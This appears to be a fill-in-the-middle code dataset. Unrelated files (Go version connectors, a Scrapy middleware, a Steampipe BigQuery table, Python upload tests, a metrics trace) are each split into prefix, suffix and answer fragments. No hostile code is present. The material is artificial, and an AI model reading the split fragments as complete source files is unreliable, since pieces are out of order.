func (vc *DBVersionConnector) FindVersionByProjectAndRevision(projectId, revision string) (*model.Version, error) {
	query := model.BaseVersionByProjectIdAndRevision(projectId, revision)
	return model.VersionFindOne(query)
}
// AddGitTagToVersion records gitTag on the version document identified by
// versionId, delegating to the model layer.
func (vc *DBVersionConnector) AddGitTagToVersion(versionId string, gitTag model.GitTag) error {
	return model.AddGitTag(versionId, gitTag)
}
// AbortVersion aborts all tasks of a version given its ID.
// It wraps the service level AbortModel.Version
func (vc *DBVersionConnector) AbortVersion(versionId, caller string) error {
	// Record who requested the abort so it is attached to the tasks' abort info.
	return task.AbortVersion(versionId, task.AbortInfo{User: caller})
}
// RestartVersion wraps the service level RestartVersion, which restarts
// completed tasks associated with a given versionId. It also sets the abort
// flag on any in-progress tasks and updates all builds containing the tasks
// affected.
func (vc *DBVersionConnector) RestartVersion(versionId string, caller string) error {
	// Get a list of all tasks of the given versionId.
	tasks, err := task.Find(task.ByVersion(versionId))
	if err != nil {
		return err
	}
	if tasks == nil {
		return gimlet.ErrorResponse{
			StatusCode: http.StatusNotFound,
			Message:    fmt.Sprintf("version with id %s not found", versionId),
		}
	}
	// Pre-size the ID slice, and name the loop variable "t" so it does not
	// shadow the imported "task" package (the original loop variable did).
	taskIds := make([]string, 0, len(tasks))
	for _, t := range tasks {
		taskIds = append(taskIds, t.Id)
	}
	// The "true" argument requests aborting in-progress tasks as well.
	return model.RestartVersion(versionId, taskIds, true, caller)
}
// LoadProjectForVersion resolves the parsed project configuration for the
// given version.
// NOTE(review): the semantics of the trailing "false" argument live in the
// model package — confirm there before changing it.
func (bc *DBVersionConnector) LoadProjectForVersion(v *model.Version, projectId string) (*model.Project, *model.ParserProject, error) {
	return model.LoadProjectForVersion(v, projectId, false)
}
// Fetch versions until 'numVersionElements' elements are created, including
// elements consisting of multiple versions rolled-up into one.
// The skip value indicates how many versions back in time should be skipped
// before starting to fetch versions, the project indicates which project the
// returned versions should be a part of.
func (vc *DBVersionConnector) GetVersionsAndVariants(skip, numVersionElements int, project *model.Project) (*restModel.VersionVariantData, error) {
// the final array of versions to return
finalVersions := []restModel.APIVersions{}
// list of builds that are in the search results, analogous to a row in the waterfall
buildList := map[string]restModel.BuildList{}
// buildvariant names that have at least 1 active version
buildVariants := []string{}
// build variant mappings - used so we can store the display name as
// the build variant field of a build
buildVariantMappings := project.GetVariantMappings()
// keep track of the last rolled-up version, so inactive versions can
// be added
var lastRolledUpVersion *restModel.APIVersions
// loop until we have enough from the db
for len(finalVersions) < numVersionElements {
// fetch the versions and associated builds
versionsFromDB, buildsByVersion, err :=
model.FetchVersionsAndAssociatedBuilds(project, skip, numVersionElements, true)
if err != nil {
return nil, errors.Wrap(err,
"error fetching versions and builds")
}
// if we've reached the beginning of all versions
if len(versionsFromDB) == 0 {
break
}
// to fetch started tasks and failed tests for providing additional context
// in a tooltip
failedAndStartedTaskIds := []string{}
// update the amount skipped
skip += len(versionsFromDB)
// create the necessary versions, rolling up inactive ones
for _, versionFromDB := range versionsFromDB {
// if we have hit enough versions, break out | // the builds for the version
buildsInVersion := buildsByVersion[versionFromDB.Id]
// see if there are any active tasks in the version
versionActive := anyActiveTasks(buildsInVersion)
// add any represented build variants to the set and initialize rows
for _, b := range buildsInVersion {
displayName := buildVariantMappings[b.BuildVariant]
if displayName == "" {
displayName = b.BuildVariant
}
buildVariants = append(buildVariants, displayName)
buildVariant := buildVariantMappings[b.BuildVariant]
if buildVariant == "" {
buildVariant = b.BuildVariant
}
if _, ok := buildList[b.BuildVariant]; !ok {
buildList[b.BuildVariant] = restModel.BuildList{
Builds: map[string]restModel.APIBuild{},
BuildVariant: buildVariant,
}
}
}
// if it is inactive, roll up the version and don't create any
// builds for it
if !versionActive {
if lastRolledUpVersion == nil {
lastRolledUpVersion = &restModel.APIVersions{RolledUp: true, Versions: []restModel.APIVersion{}}
}
// add the version data into the last rolled-up version
newVersion := restModel.APIVersion{}
err = newVersion.BuildFromService(&versionFromDB)
if err != nil {
return nil, errors.Wrapf(err, "error converting version %s from DB model", versionFromDB.Id)
}
lastRolledUpVersion.Versions = append(lastRolledUpVersion.Versions, newVersion)
// move on to the next version
continue
}
// add a pending rolled-up version, if it exists
if lastRolledUpVersion != nil {
finalVersions = append(finalVersions, *lastRolledUpVersion)
lastRolledUpVersion = nil
}
// if we have hit enough versions, break out
if len(finalVersions) == numVersionElements {
break
}
// if the version can not be rolled up, create a fully fledged
// version for it
activeVersion := restModel.APIVersion{}
err = activeVersion.BuildFromService(&versionFromDB)
if err != nil {
return nil, errors.Wrapf(err, "error converting version %s from DB model", versionFromDB.Id)
}
// add the builds to the "row"
for _, b := range buildsInVersion {
currentRow := buildList[b.BuildVariant]
buildsForRow := restModel.APIBuild{}
err = buildsForRow.BuildFromService(b)
if err != nil {
return nil, errors.Wrapf(err, "error converting build %s from DB model", b.Id)
}
currentRow.Builds[versionFromDB.Id] = buildsForRow
buildList[b.BuildVariant] = currentRow
for _, task := range buildsForRow.TaskCache {
if task.Status == evergreen.TaskFailed || task.Status == evergreen.TaskStarted {
failedAndStartedTaskIds = append(failedAndStartedTaskIds, task.Id)
}
}
}
// add the version
finalVersions = append(finalVersions, restModel.APIVersions{RolledUp: false, Versions: []restModel.APIVersion{activeVersion}})
}
if err = addFailedAndStartedTests(buildList, failedAndStartedTaskIds); err != nil {
return nil, err
}
}
// if the last version was rolled-up, add it
if lastRolledUpVersion != nil {
finalVersions = append(finalVersions, *lastRolledUpVersion)
}
return &restModel.VersionVariantData{
Rows: buildList,
Versions: finalVersions,
BuildVariants: buildVariants,
}, nil
}
// anyActiveTasks reports whether any task cached on any of the given builds
// is activated. The loop variables are named so they do not shadow the
// imported "build" and "task" packages (the originals did).
func anyActiveTasks(builds []build.Build) bool {
	for i := range builds {
		for _, tc := range builds[i].Tasks {
			if tc.Activated {
				return true
			}
		}
	}
	return false
}
// addFailedAndStartedTests adds all of the failed tests associated with a task
// to the matching task-cache entries in the given waterfall rows, sorted by
// test file name.
func addFailedAndStartedTests(rows map[string]restModel.BuildList, failedAndStartedTaskIds []string) error {
	failedAndStartedTasks, err := task.Find(task.ByIds(failedAndStartedTaskIds))
	if err != nil {
		return errors.Wrap(err, "error fetching failed tasks")
	}
	// Pull in the most recent test results for each task before inspecting them.
	for i := range failedAndStartedTasks {
		if err := failedAndStartedTasks[i].MergeNewTestResults(); err != nil {
			return errors.Wrap(err, "error merging test results")
		}
	}

	// Map each task ID to the file names of its failed tests.
	failedTestsByTaskId := map[string][]string{}
	for _, t := range failedAndStartedTasks {
		failedTests := []string{}
		for _, r := range t.LocalTestResults {
			if r.Status == evergreen.TestFailedStatus {
				failedTests = append(failedTests, r.TestFile)
			}
		}
		failedTestsByTaskId[t.Id] = failedTests
	}

	// Attach the failed test names to every matching cached task, keeping the
	// list sorted for deterministic output.
	for buildVariant, row := range rows {
		for versionId, build := range row.Builds {
			for i, task := range build.TaskCache {
				if len(failedTestsByTaskId[task.Id]) != 0 {
					rows[buildVariant].Builds[versionId].TaskCache[i].FailedTestNames = append(
						rows[buildVariant].Builds[versionId].TaskCache[i].FailedTestNames,
						failedTestsByTaskId[task.Id]...)
					sort.Strings(rows[buildVariant].Builds[versionId].TaskCache[i].FailedTestNames)
				}
			}
		}
	}
	return nil
}
// CreateVersionFromConfig creates a new version from the given project info
// and metadata via the repotracker. When active is true, every build of the
// new version is activated immediately.
func (vc *DBVersionConnector) CreateVersionFromConfig(ctx context.Context, projectInfo *model.ProjectInfo,
	metadata model.VersionMetadata, active bool) (*model.Version, error) {
	newVersion, err := repotracker.CreateVersionFromConfig(ctx, projectInfo, metadata, false, nil)
	if err != nil {
		return nil, gimlet.ErrorResponse{
			StatusCode: http.StatusInternalServerError,
			Message:    fmt.Sprintf("error creating version: %s", err.Error()),
		}
	}
	if active {
		// Collect activation failures across all builds instead of stopping
		// at the first one.
		catcher := grip.NewBasicCatcher()
		for _, b := range newVersion.BuildIds {
			catcher.Add(model.SetBuildActivation(b, true, evergreen.DefaultTaskActivator, true))
		}
		if catcher.HasErrors() {
			return nil, gimlet.ErrorResponse{
				StatusCode: http.StatusInternalServerError,
				Message:    fmt.Sprintf("error activating builds: %s", catcher.Resolve().Error()),
			}
		}
	}
	return newVersion, nil
}
// MockVersionConnector stores a cached set of tasks that are queried against by the
// implementations of the Connector interface's Version related functions.
type MockVersionConnector struct {
	// CachedTasks backs FindCostByVersionId and AbortVersion.
	CachedTasks []task.Task
	// CachedVersions backs the version lookup methods.
	CachedVersions []model.Version
	// CachedRestartedVersions maps version ID -> caller, recorded by RestartVersion.
	CachedRestartedVersions map[string]string
}
// FindCostByVersionId is the mock implementation of the function for the
// Connector interface without needing to use a database. It sums TimeTaken
// over the cached tasks belonging to versionId, simulating the aggregation.
func (mvc *MockVersionConnector) FindCostByVersionId(versionId string) (*task.VersionCost, error) {
	found := false
	cost := task.VersionCost{}
	for i := range mvc.CachedTasks {
		t := &mvc.CachedTasks[i]
		if t.Version != versionId {
			continue
		}
		if !found {
			cost.VersionId = versionId
			found = true
		}
		cost.SumTimeTaken += t.TimeTaken
	}
	// Mirror the real connector: no matching task means an error.
	if !found {
		return nil, fmt.Errorf("no task with version_id %s has been found", versionId)
	}
	return &cost, nil
}
// FindVersionById is the mock implementation of the function for the
// Connector interface without needing to use a database. It scans the cached
// versions and returns a copy of the first match, or a 404-style error.
func (mvc *MockVersionConnector) FindVersionById(versionId string) (*model.Version, error) {
	for i := range mvc.CachedVersions {
		if mvc.CachedVersions[i].Id == versionId {
			// Return a copy so callers cannot mutate the cache through the
			// pointer (same behavior as the original range-by-value loop).
			match := mvc.CachedVersions[i]
			return &match, nil
		}
	}
	return nil, gimlet.ErrorResponse{
		StatusCode: http.StatusNotFound,
		Message:    fmt.Sprintf("build with id %s not found", versionId),
	}
}
// FindVersionByProjectAndRevision returns a copy of the first cached version
// matching both the project identifier and the revision; (nil, nil) when none
// matches.
func (mvc *MockVersionConnector) FindVersionByProjectAndRevision(projectId, revision string) (*model.Version, error) {
	for i := range mvc.CachedVersions {
		candidate := mvc.CachedVersions[i]
		if candidate.Identifier == projectId && candidate.Revision == revision {
			return &candidate, nil
		}
	}
	return nil, nil
}
// AddGitTagToVersion appends gitTag to the cached version matching versionId.
// It returns nil on success and an error when no cached version has that ID.
//
// Fixes two defects in the previous implementation: the range-by-value loop
// appended the tag to a copy of the version (so the mutation was silently
// discarded), and the function returned "no version found" unconditionally,
// even when a match existed.
func (mvc *MockVersionConnector) AddGitTagToVersion(versionId string, gitTag model.GitTag) error {
	for i := range mvc.CachedVersions {
		if mvc.CachedVersions[i].Id == versionId {
			// Mutate the cached element in place via its index.
			mvc.CachedVersions[i].GitTags = append(mvc.CachedVersions[i].GitTags, gitTag)
			return nil
		}
	}
	return errors.New("no version found")
}
// AbortVersion aborts all tasks of a version given its ID. Specifically, it
// sets the Aborted flag on cached tasks of that version that are currently in
// an abortable status (started or dispatched).
func (mvc *MockVersionConnector) AbortVersion(versionId, caller string) error {
	for i := range mvc.CachedTasks {
		t := &mvc.CachedTasks[i]
		if t.Version != versionId {
			continue
		}
		if t.Status != evergreen.TaskStarted && t.Status != evergreen.TaskDispatched {
			continue
		}
		// Idempotent: setting an already-aborted task again is harmless.
		t.Aborted = true
	}
	return nil
}
// The main function of the RestartVersion() for the MockVersionConnector is to
// test connectivity. It sets the value of versionId in CachedRestartedVersions
// to the caller.
func (mvc *MockVersionConnector) RestartVersion(versionId string, caller string) error {
	// Record the request so tests can assert it was made; never fails.
	mvc.CachedRestartedVersions[versionId] = caller
	return nil
}
// GetVersionsAndVariants is a no-op stub that satisfies the Connector interface.
func (mvc *MockVersionConnector) GetVersionsAndVariants(skip, numVersionElements int, project *model.Project) (*restModel.VersionVariantData, error) {
	return nil, nil
}
// CreateVersionFromConfig is a no-op stub that satisfies the Connector interface.
func (mvc *MockVersionConnector) CreateVersionFromConfig(ctx context.Context, projectInfo *model.ProjectInfo, metadata model.VersionMetadata, active bool) (*model.Version, error) {
	return nil, nil
}
// LoadProjectForVersion parses the project configuration embedded in the
// version itself. When v.Config is non-empty it is loaded into a fresh
// model.Project under projectId; an empty config yields an error.
func (mvc *MockVersionConnector) LoadProjectForVersion(v *model.Version, projectId string) (*model.Project, *model.ParserProject, error) {
	if v.Config != "" {
		p := &model.Project{}
		pp, err := model.LoadProjectInto([]byte(v.Config), projectId, p)
		return p, pp, err
	}
	return nil, nil, errors.New("no project for version")
} | if len(finalVersions) == numVersionElements {
break
}
|
middlewares.py | # -*- coding: utf-8 -*-
# Define here the models for your spider middleware
#
# See documentation in:
# https://doc.scrapy.org/en/latest/topics/spider-middleware.html
from scrapy import signals
class QiubaiSpiderMiddleware(object):
    """Pass-through spider middleware.

    Every hook either forwards its input unchanged or does nothing, matching
    Scrapy's generated project template; undefined hooks would behave the same.
    """

    @classmethod
    def from_crawler(cls, crawler):
        # Factory used by Scrapy to build the middleware; also subscribes to
        # the spider_opened signal so start-up is logged.
        middleware = cls()
        crawler.signals.connect(middleware.spider_opened, signal=signals.spider_opened)
        return middleware

    def process_spider_input(self, response, spider):
        # Runs for each response entering the spider; returning None lets
        # processing continue unchanged.
        return None

    def process_spider_output(self, response, result, spider):
        # Forward every Request/dict/Item produced by the spider untouched.
        yield from result

    def process_spider_exception(self, response, exception, spider):
        # No special handling: let other middlewares / Scrapy deal with it.
        pass

    def process_start_requests(self, start_requests, spider):
        # Like process_spider_output but for the spider's start requests
        # (no response is associated); must yield only requests.
        yield from start_requests

    def spider_opened(self, spider):
        spider.logger.info('Spider opened: %s' % spider.name)
class QiubaiDownloaderMiddleware(object):
# Not all methods need to be defined. If a method is not defined,
# scrapy acts as if the downloader middleware does not modify the
# passed objects.
    @classmethod
    def from_crawler(cls, crawler):
        # Factory used by Scrapy to instantiate the middleware; also hooks the
        # spider_opened signal so we can log when a spider starts.
        s = cls()
        crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
        return s
    def process_request(self, request, spider):
        # Called for each request that goes through the downloader middleware.
        # Returning None (as here) continues normal processing; a Response
        # would short-circuit the download, a Request would be rescheduled,
        # and raising IgnoreRequest would invoke the installed
        # process_exception() hooks instead.
        return None
def pr | elf, request, response, spider):
# Called with the response returned from the downloader.
# Must either;
# - return a Response object
# - return a Request object
# - or raise IgnoreRequest
return response
    def process_exception(self, request, exception, spider):
        # Called when a download handler or another middleware's
        # process_request() raises. Returning None (as here) lets the
        # exception continue through the remaining middlewares; a Response or
        # Request return value would stop the process_exception() chain.
        pass
    def spider_opened(self, spider):
        # Signal handler registered in from_crawler; logs spider start-up.
        spider.logger.info('Spider opened: %s' % spider.name)
| ocess_response(s |
06_01_name_conflict.py | def | ():
pass
print() | print |
table_gcp_bigquery_dataset.go | package gcp
import (
"context"
"strings"
"github.com/turbot/steampipe-plugin-sdk/grpc/proto"
"github.com/turbot/steampipe-plugin-sdk/plugin"
"github.com/turbot/steampipe-plugin-sdk/plugin/transform"
"google.golang.org/api/bigquery/v2"
)
//// TABLE DEFINITION
// tableGcpBigQueryDataset defines the gcp_bigquery_dataset table: datasets can
// be fetched individually via the "dataset_id" key column or listed for the
// active project. Columns absent from the list response declare the
// getBigQueryDataset hydrate so they are filled from the per-dataset get call.
func tableGcpBigQueryDataset(ctx context.Context) *plugin.Table {
	return &plugin.Table{
		Name:        "gcp_bigquery_dataset",
		Description: "GCP BigQuery Dataset",
		Get: &plugin.GetConfig{
			KeyColumns: plugin.SingleColumn("dataset_id"),
			Hydrate:    getBigQueryDataset,
		},
		List: &plugin.ListConfig{
			Hydrate:           listBigQueryDatasets,
			// Treat permission errors (HTTP 403) as an empty result instead of
			// failing the whole query.
			ShouldIgnoreError: isIgnorableError([]string{"403"}),
		},
		Columns: []*plugin.Column{
			{
				Name:        "name",
				Description: "A descriptive name for the dataset, if one exists.",
				Type:        proto.ColumnType_STRING,
				Transform:   transform.FromField("FriendlyName"),
			},
			{
				Name:        "dataset_id",
				Description: "The ID of the dataset resource.",
				Type:        proto.ColumnType_STRING,
				Transform:   transform.FromField("DatasetReference.DatasetId"),
			},
			{
				Name:        "id",
				Description: "The fully-qualified, unique, opaque ID of the dataset.",
				Type:        proto.ColumnType_STRING,
			},
			{
				Name:        "kind",
				Description: "The type of the resource. This property always returns the value 'bigquery#dataset'.",
				Type:        proto.ColumnType_STRING,
			},
			// The columns below need the per-dataset get call (getBigQueryDataset)
			// because the list response does not include them.
			{
				Name:        "creation_time",
				Description: "The time when this dataset was created.",
				Type:        proto.ColumnType_TIMESTAMP,
				Hydrate:     getBigQueryDataset,
				Transform:   transform.FromField("CreationTime").Transform(transform.UnixMsToTimestamp),
			},
			{
				Name:        "description",
				Description: "A user-friendly description of the dataset.",
				Type:        proto.ColumnType_STRING,
				Hydrate:     getBigQueryDataset,
			},
			{
				Name:        "etag",
				Description: "A hash of the resource.",
				Type:        proto.ColumnType_STRING,
				Hydrate:     getBigQueryDataset,
			},
			{
				Name:        "default_partition_expiration_ms",
				Description: "The default partition expiration for all partitioned tables in the dataset, in milliseconds.",
				Type:        proto.ColumnType_INT,
				Hydrate:     getBigQueryDataset,
			},
			{
				Name:        "default_table_expiration_ms",
				Description: "The default lifetime of all tables in the dataset, in milliseconds.",
				Type:        proto.ColumnType_INT,
				Hydrate:     getBigQueryDataset,
			},
			{
				Name:        "kms_key_name",
				Description: "Describes the Cloud KMS encryption key that will be used to protect destination BigQuery table.",
				Type:        proto.ColumnType_STRING,
				Hydrate:     getBigQueryDataset,
				Transform:   transform.FromField("DefaultEncryptionConfiguration.KmsKeyName"),
			},
			{
				Name:        "last_modified_time",
				Description: "The date when this dataset or any of its tables was last modified.",
				Type:        proto.ColumnType_TIMESTAMP,
				Hydrate:     getBigQueryDataset,
				Transform:   transform.FromField("LastModifiedTime").Transform(transform.UnixMsToTimestamp),
			},
			{
				Name:        "self_link",
				Description: "An URL that can be used to access the resource again.",
				Type:        proto.ColumnType_STRING,
				Hydrate:     getBigQueryDataset,
			},
			{
				Name:        "access",
				Description: "An array of objects that define dataset access for one or more entities.",
				Type:        proto.ColumnType_JSON,
				Hydrate:     getBigQueryDataset,
			},
			{
				Name:        "labels",
				Description: "A set of labels associated with this dataset.",
				Type:        proto.ColumnType_JSON,
			},

			// standard steampipe columns
			{
				Name:        "title",
				Description: ColumnDescriptionTitle,
				Type:        proto.ColumnType_STRING,
				Transform:   transform.From(bigQueryDatasetTitle),
			},
			{
				Name:        "tags",
				Description: ColumnDescriptionTags,
				Type:        proto.ColumnType_JSON,
				Transform:   transform.FromField("Labels"),
			},
			{
				Name:        "akas",
				Description: ColumnDescriptionAkas,
				Type:        proto.ColumnType_JSON,
				Transform:   transform.From(bigQueryDatasetAka),
			},

			// standard gcp columns
			{
				Name:        "location",
				Description: ColumnDescriptionLocation,
				Type:        proto.ColumnType_STRING,
			},
			{
				Name:        "project",
				Description: ColumnDescriptionProject,
				Type:        proto.ColumnType_STRING,
				Transform:   transform.FromField("DatasetReference.ProjectId"),
			},
		},
	}
}
//// LIST FUNCTION
func listBigQueryDatasets(ctx context.Context, d *plugin.QueryData, _ *plugin.HydrateData) (interface{}, error) |
//// HYDRATE FUNCTIONS
// getBigQueryDataset fetches a single BigQuery dataset. It serves both as the
// table's get hydrate (dataset id taken from the "dataset_id" key-column qual)
// and as a per-row hydrate for list results (id parsed from the listed item).
func getBigQueryDataset(ctx context.Context, d *plugin.QueryData, h *plugin.HydrateData) (interface{}, error) {
	// Trace entry for parity with listBigQueryDatasets.
	plugin.Logger(ctx).Trace("getBigQueryDataset")

	// Create Service Connection
	service, err := BigQueryService(ctx, d)
	if err != nil {
		return nil, err
	}

	// Get project details
	projectData, err := activeProject(ctx, d)
	if err != nil {
		return nil, err
	}
	project := projectData.Project

	var id string
	if h.Item != nil {
		// List results carry a fully-qualified "<project>:<dataset>" ID; keep
		// only the dataset part. SplitN plus taking the last element avoids the
		// index-out-of-range panic that strings.Split(data, ":")[1] would hit
		// on an ID without a ":" separator.
		parts := strings.SplitN(datasetID(h.Item), ":", 2)
		id = parts[len(parts)-1]
	} else {
		id = d.KeyColumnQuals["dataset_id"].GetStringValue()
	}

	resp, err := service.Datasets.Get(project, id).Do()
	if err != nil {
		return nil, err
	}
	return resp, nil
}
//// TRANSFORM FUNCTIONS
// bigQueryDatasetAka builds the dataset's AKA from its "<project>:<dataset>"
// ID. A single SplitN replaces the original's two strings.Split calls, and
// taking the last element keeps a malformed ID (no ":") from panicking with an
// index-out-of-range.
func bigQueryDatasetAka(ctx context.Context, h *transform.TransformData) (interface{}, error) {
	parts := strings.SplitN(datasetID(h.HydrateItem), ":", 2)
	projectID := parts[0]
	id := parts[len(parts)-1]
	akas := []string{"gcp://bigquery.googleapis.com/projects/" + projectID + "/datasets/" + id}
	return akas, nil
}
// bigQueryDatasetTitle prefers the dataset's friendly name and falls back to
// the dataset-ID portion of the "<project>:<dataset>" identifier. Using the
// last SplitN element avoids the panic the original Split(...)[1] would hit on
// an ID without a ":" separator; the ID is only parsed when actually needed.
func bigQueryDatasetTitle(ctx context.Context, h *transform.TransformData) (interface{}, error) {
	if name := datasetName(h.HydrateItem); len(name) > 0 {
		return name, nil
	}
	parts := strings.SplitN(datasetID(h.HydrateItem), ":", 2)
	return parts[len(parts)-1], nil
}
// datasetID extracts the fully-qualified ID from either shape of BigQuery
// dataset item (a list entry or a full dataset); unknown types yield "".
func datasetID(item interface{}) string {
	if listed, ok := item.(*bigquery.DatasetListDatasets); ok {
		return listed.Id
	}
	if ds, ok := item.(*bigquery.Dataset); ok {
		return ds.Id
	}
	return ""
}
// datasetName extracts the friendly name from either shape of BigQuery
// dataset item (a list entry or a full dataset); unknown types yield "".
func datasetName(item interface{}) string {
	if listed, ok := item.(*bigquery.DatasetListDatasets); ok {
		return listed.FriendlyName
	}
	if ds, ok := item.(*bigquery.Dataset); ok {
		return ds.FriendlyName
	}
	return ""
}
| {
plugin.Logger(ctx).Trace("listBigQueryDatasets")
// Create Service Connection
service, err := BigQueryService(ctx, d)
if err != nil {
return nil, err
}
// Get project details
projectData, err := activeProject(ctx, d)
if err != nil {
return nil, err
}
project := projectData.Project
resp := service.Datasets.List(project)
if err := resp.Pages(ctx, func(page *bigquery.DatasetList) error {
for _, dataset := range page.Datasets {
d.StreamListItem(ctx, dataset)
}
return nil
}); err != nil {
return nil, err
}
return nil, nil
} |
test_data.py | # pylint: disable=redefined-builtin
# pylint: disable=too-many-arguments
"""Test related method and functionality of Context."""
import pytest
import responses
from decanter.core import Context
from decanter.core.core_api import TrainInput
from decanter.core.extra import CoreStatus
from decanter.core.jobs import DataUpload
# Parametrization grid: every failure status paired with both a missing and a
# present result, plus the inconsistent case of a DONE task with no result.
fail_conds = [(stat, res) for stat in CoreStatus.FAIL_STATUS for res in [None, 'result']]
fail_conds.append((CoreStatus.DONE, None))
@responses.activate
def test_data_success(
        globals, client, mock_test_responses, context_fixture):
    """DataUpload gets the id and result when uploading a csv file or a DataFrame."""
    context = context_fixture('Healthy')
    # Mock the upload endpoint so both uploads resolve to the same done task.
    mock_test_responses(task='upload', status=CoreStatus.DONE)
    data = client.upload(file=globals['test_csv_file'])
    data_ = client.upload(file=globals['test_df'])
    context.run()
    # Both upload styles must yield identical task id, data id, status, result.
    assert data.task.id == data_.task.id == globals['upload']
    assert data.id == data_.id == globals['data']
    assert data.status == data_.status == CoreStatus.DONE
    assert data.result == data_.result == globals['results']['upload']
@responses.activate
@pytest.mark.parametrize('status, result', fail_conds)
def test_data_fail(
        globals, client, status, result, mock_test_responses, context_fixture):
    """DataUpload fails when status and result create fail conditions."""
    context = context_fixture('Healthy')
    mock_test_responses(task='upload', status=status, task_result=result)
    data = client.upload(file=globals['test_csv_file'])
    context.run()
    assert data.task.id == globals['upload']
    # On failure no data id is assigned; status/result mirror the mocked task.
    assert data.id is None
    assert data.status == status
    assert data.result == result
@responses.activate
def test_no_file(client, mock_test_responses, context_fixture):
    """Raise exceptions when upload empty files."""
    context_fixture('Healthy')
    mock_test_responses(task='upload')
    # Uploading nothing is rejected client-side before any request is made.
    with pytest.raises(Exception):
        client.upload(file=None)
@responses.activate
@pytest.mark.parametrize('status', [CoreStatus.PENDING, CoreStatus.RUNNING, CoreStatus.FAIL])
def test_data_stop(
globals, urls, client, status, mock_test_responses, context_fixture):
"""DataUpload status is fail if stopped during pending, running, and fail status,
remains if in done status. The experiment following will failed if data
failed.
"""
async def | (data):
data.stop()
return
context = context_fixture('Healthy')
mock_test_responses(task='upload', status=status)
mock_test_responses(task='train', status=CoreStatus.DONE)
responses.add(
responses.PUT, urls('stop', 'upload'),
json={
'message': 'task removed'
},
status=200,
content_type='application/json')
if status == CoreStatus.DONE:
data = DataUpload()
data.status = CoreStatus.DONE
else:
data = client.upload(file=globals['test_csv_file'])
exp = client.train(TrainInput(
data=data, target='test-target', algos=['test-algo']))
cancel_task = Context.LOOP.create_task(cancel(data))
Context.CORO_TASKS.append(cancel_task)
context.run()
if status == CoreStatus.DONE:
assert data.status == CoreStatus.DONE
assert exp.status == CoreStatus.DONE
else:
assert data.status == CoreStatus.FAIL
assert exp.status == CoreStatus.FAIL
| cancel |
mcc.py | # Copyright 2019 The FastEstimator Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from typing import Union, Iterable
import numpy as np
from sklearn.metrics import matthews_corrcoef
from fastestimator.trace.meta._per_ds import per_ds
from fastestimator.trace.trace import Trace
from fastestimator.util.data import Any, Data, Dict
from fastestimator.util.traceability_util import traceable
from fastestimator.util.util import to_number
@per_ds
@traceable()
class MCC(Trace):
"""A trace which computes the Matthews Correlation Coefficient for a given set of predictions.
This is a preferable metric to accuracy or F1 score since it automatically corrects for class imbalances and does
not depend on the choice of target class (https://www.ncbi.nlm.nih.gov/pmc/articles/PMC6941312/). Ideal value is 1,
a value of 0 means your predictions are completely uncorrelated with the true data. A value less than zero implies
anti-correlation (you should invert your classifier predictions in order to do better).
Args:
true_key: Name of the key that corresponds to ground truth in the batch dictionary.
pred_key: Name of the key that corresponds to predicted score in the batch dictionary.
mode: What mode(s) to execute this Trace in. For example, "train", "eval", "test", or "infer". To execute
regardless of mode, pass None. To execute in all modes except for a particular one, you can pass an argument
like "!infer" or "!train".
ds_id: What dataset id(s) to execute this Trace in. To execute regardless of ds_id, pass None. To execute in all
ds_ids except for a particular one, you can pass an argument like "!ds1".
output_name: What to call the output from this trace (for example in the logger output).
per_ds: Whether to automatically compute this metric individually for every ds_id it runs on, in addition to
computing an aggregate across all ds_ids on which it runs. This is automatically False if `output_name`
contains a "|" character.
**kwargs: Additional keyword arguments that pass to sklearn.metrics.matthews_corrcoef()
Raises:
ValueError: One of ["y_true", "y_pred"] argument exists in `kwargs`.
"""
    def __init__(self,
                 true_key: str,
                 pred_key: str,
                 mode: Union[None, str, Iterable[str]] = ("eval", "test"),
                 ds_id: Union[None, str, Iterable[str]] = None,
                 output_name: str = "mcc",
                 per_ds: bool = True,
                 **kwargs) -> None:
        # Reject kwargs (y_true/y_pred) that would collide with the arguments
        # this trace itself passes to sklearn.metrics.matthews_corrcoef.
        MCC.check_kwargs(kwargs)
        super().__init__(inputs=(true_key, pred_key), mode=mode, outputs=output_name, ds_id=ds_id)
        # Extra kwargs are forwarded verbatim to matthews_corrcoef at epoch end.
        self.kwargs = kwargs
        # Per-epoch accumulators of ground-truth / predicted labels.
        self.y_true = []
        self.y_pred = []
        self.per_ds = per_ds
    @property
    def true_key(self) -> str:
        # Ground-truth key is the first element of the trace's inputs tuple.
        return self.inputs[0]
    @property
    def pred_key(self) -> str:
        # Prediction key is the second element of the trace's inputs tuple.
        return self.inputs[1]
    def on_epoch_begin(self, data: Data) -> None:
        # Reset accumulators so each epoch's MCC is computed independently.
        self.y_true = []
        self.y_pred = []
    def on_batch_end(self, data: Data) -> None:
        y_true, y_pred = to_number(data[self.true_key]), to_number(data[self.pred_key])
        # Multi-column (e.g. one-hot) ground truth: collapse to class indices.
        if y_true.shape[-1] > 1 and y_true.ndim > 1:
            y_true = np.argmax(y_true, axis=-1)
        # Multi-class scores collapse via argmax; a single-column prediction is
        # treated as a probability and rounded to a 0/1 label instead.
        if y_pred.shape[-1] > 1 and y_pred.ndim > 1:
            y_pred = np.argmax(y_pred, axis=-1)
        else:
            y_pred = np.round(y_pred)
        assert y_pred.size == y_true.size
        self.y_true.extend(y_true)
        self.y_pred.extend(y_pred)
def on_epoch_end(self, data: Data) -> None:
|
    @staticmethod
    def check_kwargs(kwargs: Dict[str, Any]) -> None:
        """Check if `kwargs` has any blacklist argument and raise an error if it does.
        Args:
            kwargs: Keyword arguments to be examined.
        Raises:
            ValueError: One of ["y_true", "y_pred"] argument exists in `kwargs`.
        """
        blacklist = ["y_true", "y_pred"]
        illegal_kwarg = [x for x in blacklist if x in kwargs]
        if illegal_kwarg:
            raise ValueError(
                f"Arguments {illegal_kwarg} cannot exist in kwargs, since FastEstimator will later directly use them in"
                " sklearn.metrics.matthews_corrcoef()")
| data.write_with_log(self.outputs[0], matthews_corrcoef(y_true=self.y_true, y_pred=self.y_pred, **self.kwargs)) |
expressroutegateways.go | package network
// Copyright (c) Microsoft and contributors. All rights reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
// http://www.apache.org/licenses/LICENSE-2.0
//
